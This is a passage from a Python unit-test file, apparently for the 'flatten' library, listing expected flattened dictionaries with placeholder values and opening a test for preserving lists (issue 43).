"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1.1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2.2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n4",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n5",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f7",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f8",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f9",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f10",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n6",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 7,
"f_gar_garp_gat": "f11",
"c_c_foo": 5,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f7",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f7",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f7",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f8",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f8",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f8",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f9",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f9",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f9",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f10",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f10",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f10",
"c_c_foo": None,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f11",
"c_c_foo": None,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f11",
"c_c_foo": None,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": 100,
"c_c_baz": None,
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": None,
"f_gar_garp_gat": "f11",
"c_c_foo": None,
"d": 10}]
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue43(self):
"""https://github.com/amirziai/flatten/issues/43"""
dic = {
'a': {'a': ["x0", "x1", "x2"]},
'b': {'b': 'foo', 'c': 'bar'},
'c': {'c': [
{'foo': 2, 'bar': 6, 'baz': [
"n1", "n2", "n3", "n1.1", "n2.2"]},
{'foo': 5, 'bar': 7, 'baz': ["n4", "n5", "n6"]},
{'foo': float('nan')},
{'foo': 100},
]},
'd': {'g': 10}
}
expected = [
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n3',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n3',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n3',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n1.1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n1.1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n1.1',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 2,
'c_c_baz': 'n2.2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 2,
'c_c_baz': 'n2.2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 2,
'c_c_baz': 'n2.2',
'c_c_bar': 6,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 5,
'c_c_baz': 'n4',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 5,
'c_c_baz': 'n4',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 5,
'c_c_baz': 'n4',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x0',
'c_c_foo': 5,
'c_c_baz': 'n5',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x1',
'c_c_foo': 5,
'c_c_baz': 'n5',
'c_c_bar': 7,
'b_b': 'foo',
'd': 10,
'b_c': 'bar',
'c_c': None},
{'a_a': 'x2',
'c_c_foo': 5,
